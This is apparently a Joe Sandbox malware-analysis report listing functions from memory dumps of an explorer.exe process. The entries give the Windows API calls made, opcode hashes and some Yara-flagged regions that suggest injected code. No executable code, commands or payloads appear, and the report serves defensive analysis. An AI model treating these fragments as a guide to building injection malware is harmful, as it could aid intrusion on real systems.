Source File: 00000004.00000002.3440559555.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_30c0000_explorer.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 45f11778cda57a722a6393567c1d7e0eb36494b49288727763187d121edce633
Instruction ID: f8db8c147328d2586a1d85a313c888da488302bd49a86ceda1a8792e24fec9f4
Opcode Fuzzy Hash: 45f11778cda57a722a6393567c1d7e0eb36494b49288727763187d121edce633
Instruction Fuzzy Hash: B6E086792412147FD710DBA4CC45FD77F55FF84650F184598B9499F252C530E6008690

Uniqueness

Uniqueness Score: -1.00%

Function 030DA490 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(030D4D50,?,?,030D4D50,00000000,FFFFFFFF), ref: 030DA4B5

Memory Dump Source

Source File: 00000004.00000002.3440559555.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_30c0000_explorer.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 7e582c7d9eeca9ed35f89df2f0b4057bce7f7b06268bb9b7d107724f7595d9c9
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 90D012752003146BD710EBD8CC45ED7779CEF44650F154495BA185B241C530F50086E0

Uniqueness

Uniqueness Score: -1.00%

Function 051B2D90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 051B2D9A

Memory Dump Source

Source File: 00000004.00000002.3441817605.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true

Associated: 00000004.00000002.3441817605.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3441817605.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5140000_explorer.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 37f938d0b52f66e31e0d2ee32437578b159df1c3f6feda4a21e27d04a787badb
Instruction ID: acd61c7ee906bd2e3720749a72ff56b7e0e00bc606c6364f87bf1c193ad28cc8
Opcode Fuzzy Hash: 37f938d0b52f66e31e0d2ee32437578b159df1c3f6feda4a21e27d04a787badb
Instruction Fuzzy Hash: D5900222652051625555B1594584507481697F02417D1C056A1455960C862BD856D621

Uniqueness

Uniqueness Score: -1.00%

Function 051B2DB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 051B2DBA

Memory Dump Source

Source File: 00000004.00000002.3441817605.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true

Associated: 00000004.00000002.3441817605.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3441817605.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5140000_explorer.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5e476f20e0fc3b896d46021f13c273835ca3e4439e358b3be7a7d9c6cd914dcd
Instruction ID: 580f484e7f68427891a519d6707af72d263000a7c665c7b013f227dc2548e37b
Opcode Fuzzy Hash: 5e476f20e0fc3b896d46021f13c273835ca3e4439e358b3be7a7d9c6cd914dcd
Instruction Fuzzy Hash: FB90023261101423D12161594684707081987E0241FD1C456A0465568D975BC952A121

Uniqueness

Uniqueness Score: -1.00%

Function 051B2C30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 051B2C3A

Memory Dump Source

Source File: 00000004.00000002.3441817605.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true

Associated: 00000004.00000002.3441817605.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3441817605.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5140000_explorer.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ed896f0c3c297c2783578a5271828325210746fb5e2f3c9dad8696583dd6c9dc
Instruction ID: efce280012278f5b6830d9e9e4865e4f0aa8405435f93f58020e03084cbaef65
Opcode Fuzzy Hash: ed896f0c3c297c2783578a5271828325210746fb5e2f3c9dad8696583dd6c9dc
Instruction Fuzzy Hash: D090023261109812D1206159858474A081587E0301F95C455A4465668D879AC8917121

Uniqueness

Uniqueness Score: -1.00%

Function 051B2C20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 051B2C2A

Memory Dump Source

Source File: 00000004.00000002.3441817605.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true

Associated: 00000004.00000002.3441817605.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3441817605.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5140000_explorer.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 85217c83b13171b20c955af0b03a9f82a6573b2ee7a6a6661b04e76033fe9ea6
Instruction ID: 9afc3554b0abfc7f52d09a90741fc02df2a775020b704fcc62afbbfb5869819c
Opcode Fuzzy Hash: 85217c83b13171b20c955af0b03a9f82a6573b2ee7a6a6661b04e76033fe9ea6
Instruction Fuzzy Hash: C790023261101852D11061594584B46081587F0301F91C05AA0165664D871AC8517521

Uniqueness

Uniqueness Score: -1.00%

Function 051B2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 051B2C6A

Memory Dump Source

Source File: 00000004.00000002.3441817605.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true

Associated: 00000004.00000002.3441817605.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3441817605.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5140000_explorer.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f5c83c3ca38be730bc078e11c303fd573a6447636bf489b179c8c38293bc6b5b
Instruction ID: 69b0335700a4ecde4a91581faf773a65ea06bffcd60ef1eb70338f553dd9a2b8
Opcode Fuzzy Hash: f5c83c3ca38be730bc078e11c303fd573a6447636bf489b179c8c38293bc6b5b
Instruction Fuzzy Hash: 6390023261101412D11065995588646081587F0301F91D055A5065565EC76AC8916131

Uniqueness

Uniqueness Score: -1.00%

Function 051B2CD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 051B2CDA

Memory Dump Source

Source File: 00000004.00000002.3441817605.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true

Associated: 00000004.00000002.3441817605.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3441817605.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5140000_explorer.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3ee3b83d52715ce78fb3ac3673a8a3383db5621765d80952439a6a4c392b65ed
Instruction ID: a14a648d97532604e9ff89126a56bd0677494d853abad39546788ed10981d817
Opcode Fuzzy Hash: 3ee3b83d52715ce78fb3ac3673a8a3383db5621765d80952439a6a4c392b65ed
Instruction Fuzzy Hash: 4590022A62301012D1907159558860A081587E1202FD1D459A0056568CCA1AC8695321

Uniqueness

Uniqueness Score: -1.00%

Function 051B2FA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 051B2FAA

Memory Dump Source

Source File: 00000004.00000002.3441817605.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true

Associated: 00000004.00000002.3441817605.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3441817605.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5140000_explorer.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3b7974127389469aeaef68fabfdda8bb36c780ec13725f323acdd989d3012cc6
Instruction ID: d2e182e139389acad465a7321d6bc590e8ff23f95df1599066cb6081f19874f1
Opcode Fuzzy Hash: 3b7974127389469aeaef68fabfdda8bb36c780ec13725f323acdd989d3012cc6
Instruction Fuzzy Hash: C790022262181052D21065694D94B07081587E0303F91C159A0195564CCA1AC8615521

Uniqueness

Uniqueness Score: -1.00%

Function 051B2E60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 051B2E6A

Memory Dump Source

Source File: 00000004.00000002.3441817605.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true

Associated: 00000004.00000002.3441817605.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3441817605.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5140000_explorer.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: db1cda6fb2eb739708432a2bcfa34c2b2666888b1340b887fcf2684703fb645e
Instruction ID: e58ef12d5e6e42460cf986e6373ca17ed84788e408829b9e7e113c9a4e30c9f5
Opcode Fuzzy Hash: db1cda6fb2eb739708432a2bcfa34c2b2666888b1340b887fcf2684703fb645e
Instruction Fuzzy Hash: 9B90027261101412D15071594584746081587E0301F91C055A50A5564E875ECDD56665

Uniqueness

Uniqueness Score: -1.00%

Function 051B2EF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 051B2EFA

Memory Dump Source

Source File: 00000004.00000002.3441817605.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true

Associated: 00000004.00000002.3441817605.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3441817605.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5140000_explorer.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 18a9b8f03308283b2b1203689f8e4f5234f37540007aeab7d3aa29d96f2c6c1b
Instruction ID: a06cef5ee2f5143260ffb49e8ab20be65e7ce471854f130c2557cd2fdcc7cde2
Opcode Fuzzy Hash: 18a9b8f03308283b2b1203689f8e4f5234f37540007aeab7d3aa29d96f2c6c1b
Instruction Fuzzy Hash: AA90026275101452D11061594594B060815C7F1301F91C059E10A5564D871ECC526126

Uniqueness

Uniqueness Score: -1.00%

Function 051B2B20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 051B2B2A

Memory Dump Source

Source File: 00000004.00000002.3441817605.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true

Associated: 00000004.00000002.3441817605.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3441817605.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5140000_explorer.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d96ba443cd671ef3c61b82310a53208070e85d6f2e266003f811a9e251aa7a56
Instruction ID: cfe09ca0480d95642ec6eef34fe71cc3e1508573a3c6c41003b46ece3c956f9b
Opcode Fuzzy Hash: d96ba443cd671ef3c61b82310a53208070e85d6f2e266003f811a9e251aa7a56
Instruction Fuzzy Hash: 6A90026261201013411571594594616481A87F0201B91C065E10555A0DC62AC8916125

Uniqueness

Uniqueness Score: -1.00%

Function 051B2BB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 051B2BBA

Memory Dump Source

Source File: 00000004.00000002.3441817605.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true

Associated: 00000004.00000002.3441817605.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3441817605.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5140000_explorer.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 31804ad448976aced121197340edbf039941dd367c24f6460759ac3ed9e80e8f
Instruction ID: 0bcc3a6ad67398fbce457955081405d35800f6d23e05c5e78932538bec72a883
Opcode Fuzzy Hash: 31804ad448976aced121197340edbf039941dd367c24f6460759ac3ed9e80e8f
Instruction Fuzzy Hash: D890023261101812D1907159458464A081587E1301FD1C059A0066664DCB1ACA5977A1

Uniqueness

Uniqueness Score: -1.00%

Function 051B2BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 051B2BAA

Memory Dump Source

Source File: 00000004.00000002.3441817605.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true

Associated: 00000004.00000002.3441817605.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3441817605.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5140000_explorer.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 39834ca39d30bc5054956ff1b53df299a27fe4fce6d0da8edbd30f917eb8f0d0
Instruction ID: cf664e24acaadeb9f53cbbbb1c7a0674f2e85dcb2e9be9dfdd5c02be542d62a3
Opcode Fuzzy Hash: 39834ca39d30bc5054956ff1b53df299a27fe4fce6d0da8edbd30f917eb8f0d0
Instruction Fuzzy Hash: 1590023261505852D15071594584A46082587E0305F91C055A00A56A4D972ACD55B661

Uniqueness

Uniqueness Score: -1.00%

Function 051B2A90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 051B2A9A

Memory Dump Source

Source File: 00000004.00000002.3441817605.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true

Associated: 00000004.00000002.3441817605.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3441817605.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5140000_explorer.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1e7812e04e08fca9320d496c4101e4d6f44886a1f7e7279ac4e36e23d8958c48
Instruction ID: ce8369863eeaf55896623a3f1e6df0d952bc4af401bf890107ee73317328a934
Opcode Fuzzy Hash: 1e7812e04e08fca9320d496c4101e4d6f44886a1f7e7279ac4e36e23d8958c48
Instruction Fuzzy Hash: 88900226621010130115A5590784507085687E5351391C065F1056560CD726C8615121

Uniqueness

Uniqueness Score: -1.00%

Function 051B3590 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 051B359A

Memory Dump Source

Source File: 00000004.00000002.3441817605.0000000005140000.00000040.00001000.00020000.00000000.sdmp, Offset: 05140000, based on PE: true

Associated: 00000004.00000002.3441817605.0000000005269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3441817605.000000000526D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5140000_explorer.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2ce446218e9f16d22364cea223eadff744a73263e263f019e3c95e8f9cf5ad64
Instruction ID: 85e938ca95676f93800fc3a9d287513cc3df5e91cf5fb55fb31703da4ea2bcda
Opcode Fuzzy Hash: 2ce446218e9f16d22364cea223eadff744a73263e263f019e3c95e8f9cf5ad64
Instruction Fuzzy Hash: 3E90023261115452D510A1594584706182587E0201F91C455A1465578E876AC951A162

Uniqueness

Uniqueness Score: -1.00%

Function 030D9080 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 030D9128

Strings

net.dll, xrefs: 030D90F1, 030D9177, 030D914F, 030D915B, 030D9183
wininet.dll, xrefs: 030D90DE, 030D90E7

Memory Dump Source

Source File: 00000004.00000002.3440559555.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_30c0000_explorer.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 429f348aef8958b88b61e8abfb46746a791c24e2dc5c18e5755e05b71a4e3f43
Instruction ID: aea7057e92bf4e1674e91524d9834fbed8dd26b48ee37d779aea26de03f6e3a8
Opcode Fuzzy Hash: 429f348aef8958b88b61e8abfb46746a791c24e2dc5c18e5755e05b71a4e3f43
Instruction Fuzzy Hash: 28316FB6501745BBC724DF68C885FABB7F8AB88B00F14851DF62A6B245D730B650CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 030D9079 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 030D9128

Strings

net.dll, xrefs: 030D90F1, 030D914F, 030D915B
wininet.dll, xrefs: 030D90DE, 030D90E7

Memory Dump Source

Source File: 00000004.00000002.3440559555.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_30c0000_explorer.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: db9cbe8866ff0b7a7cec2286f7cecfc3ba6671c345ec0cdb055145d072be4608
Instruction ID: f2f9df6cc60354d60b61215af72aba38e16e4b0a955e7b05776c6ef0dc4318df
Opcode Fuzzy Hash: db9cbe8866ff0b7a7cec2286f7cecfc3ba6671c345ec0cdb055145d072be4608
Instruction Fuzzy Hash: 7421D2B5901344BBC714DF68C885FABB7F8FB88B00F14801DE62D6B244D770A550CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 030DA663 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,030C3AF8), ref: 030DA69D

Strings

.z`, xrefs: 030DA68C, 030DA698

Memory Dump Source

Source File: 00000004.00000002.3440559555.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_30c0000_explorer.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: e9badbe99cf583fc23ca86053a3da1e350e665f639dab5dd99591c2ba085b055
Instruction ID: 6318d790ce191e815077268114ade4bd0629c494c1fe12e23cd9b9aa331d6d62
Opcode Fuzzy Hash: e9badbe99cf583fc23ca86053a3da1e350e665f639dab5dd99591c2ba085b055
Instruction Fuzzy Hash: D4F0A0B02002046BDB18DF54CC44FEB77A8EF85310F214159FD1A9B251C231D8018AA0

Uniqueness

Uniqueness Score: -1.00%

Function 030DA670 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,030C3AF8), ref: 030DA69D

Strings

.z`, xrefs: 030DA68C, 030DA698

Memory Dump Source

Source File: 00000004.00000002.3440559555.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_30c0000_explorer.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 45d66945fa68eb8e8c163d551fbaee5f0a8b9e486581c6f509c743fc96187b2c
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: E6E012B5200308ABDB18EF99CC48EA777ACEF88650F118598BA085B241C630E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 030C830F Relevance: 3.1, APIs: 2, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 030C836A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 030C838B

Memory Dump Source

Source File: 00000004.00000002.3440559555.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_30c0000_explorer.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 2b9d8fc3ae90b9478df8aad8ea9b6401c0abca8a6772261868eb573efd51258e
Instruction ID: 21a58cec4d9acd0de28e4e4f99d1689b9facff50bb7cd340923a20e2dac39d46
Opcode Fuzzy Hash: 2b9d8fc3ae90b9478df8aad8ea9b6401c0abca8a6772261868eb573efd51258e
Instruction Fuzzy Hash: D701F731A913687AE720E7949C42FFE775C9B80B51F080119FF08FE1C0D6A4690646E5

Uniqueness

Uniqueness Score: -1.00%

Function 030C8310 Relevance: 3.1, APIs: 2, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 030C836A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 030C838B

Memory Dump Source

Source File: 00000004.00000002.3440559555.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_30c0000_explorer.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: eb98dd3dfbfccd50391a5d0e174e4a5484c44bf3fdb2df05183759b85b31f33b
Instruction ID: 7e6711084a69e33377781ae363778f12d5de6d4cd4790a903a37a1e947fa5dc6
Opcode Fuzzy Hash: eb98dd3dfbfccd50391a5d0e174e4a5484c44bf3fdb2df05183759b85b31f33b
Instruction Fuzzy Hash: 5301F731A9132C77E720E7949C42FFE776C5B80E51F044119FF04BE1C0E6A4690542F5

Uniqueness

Uniqueness Score: -1.00%

Function 030DA6DD Relevance: 1.5, APIs: 1, Instructions: 42
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 030DA734

Memory Dump Source

Source File: 00000004.00000002.3440559555.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_30c0000_explorer.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: f5d447aaa99e699b08e5d62a4fe8ca457db134242f7baf03e46ad1bfb163865d
Instruction ID: 3df3441ac78e3f75e9ad3ea746ed45176a00a9d9e2403cd12fd0b440c80acdc2
Opcode Fuzzy Hash: f5d447aaa99e699b08e5d62a4fe8ca457db134242f7baf03e46ad1bfb163865d
Instruction Fuzzy Hash: 9601F2B6205109ABCB04CF88DC80DEB77A9EF8C354F258648FE5997201C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 030DA6E0 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 030DA734

Memory Dump Source

Source File: 00000004.00000002.3440559555.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_30c0000_explorer.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 2587069c6b9bb0b8f24bb931dd3135c6f0b68b1fd04191a76474f4617db67a22
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 7001AFB2210208ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97240C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 030D91A3 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,030CF050,?,?,00000000), ref: 030D91EC

Memory Dump Source

Source File: 00000004.00000002.3440559555.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_30c0000_explorer.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: aed413132dd82d3425599129fb97643d591ad4fde0f95eaf61b504d8dc3875a3
Instruction ID: ff8e4df78838c678061d84711c70e72cc1a618afe4d2eea7adca8a4f8d5ecc78
Opcode Fuzzy Hash: aed413132dd82d3425599129fb97643d591ad4fde0f95eaf61b504d8dc3875a3
Instruction Fuzzy Hash: EDF0657E68134076E720AA948C06FEB63A89F91B10F650515FA49BF2C4D9A5F5018794

Uniqueness

Uniqueness Score: -1.00%

Function 030D91B0 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,030CF050,?,?,00000000), ref: 030D91EC

Memory Dump Source

Source File: 00000004.00000002.3440559555.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_30c0000_explorer.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: d8d341beacf55d3aadfcb46bdd6eb0ebc06c290d7a953d7ae1546744555f20b2
Instruction ID: 8c92d20da3844ae538038af2876af43375b7c5a0b9c0a352313464c23d67c2c0
Opcode Fuzzy Hash: d8d341beacf55d3aadfcb46bdd6eb0ebc06c290d7a953d7ae1546744555f20b2
Instruction Fuzzy Hash: FBE06D3B3813043AE320A599AC02FE7B3DC8BC1B20F150026FA0DEB2C0D995F40142A4

Uniqueness

Uniqueness Score: -1.00%

Function 030DA7CD Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,030CF1D2,030CF1D2,?,00000000,?,?), ref: 030DA800

Memory Dump Source

Source File: 00000004.00000002.3440559555.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_30c0000_explorer.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 0e6f20a2f88138ea4bda056e1c4e57432edd4adcf7d973f093ef2c0f87e4fc72
Instruction ID: dfb989fdbf9a7084c0bdd535c3bbea8ca34f37060e38e6d1cc468a4b9d99c1ba
Opcode Fuzzy Hash: 0e6f20a2f88138ea4bda056e1c4e57432edd4adcf7d973f093ef2c0f87e4fc72
Instruction Fuzzy Hash: 43E092B17002087BDB10DF54CC40EEB37A8EF85250F108168F90D9B641C530A8018BB0

Uniqueness

Uniqueness Score: -1.00%

Function 030DA6A3 Relevance: 1.5, APIs: 1, Instructions: 25processCOMMON
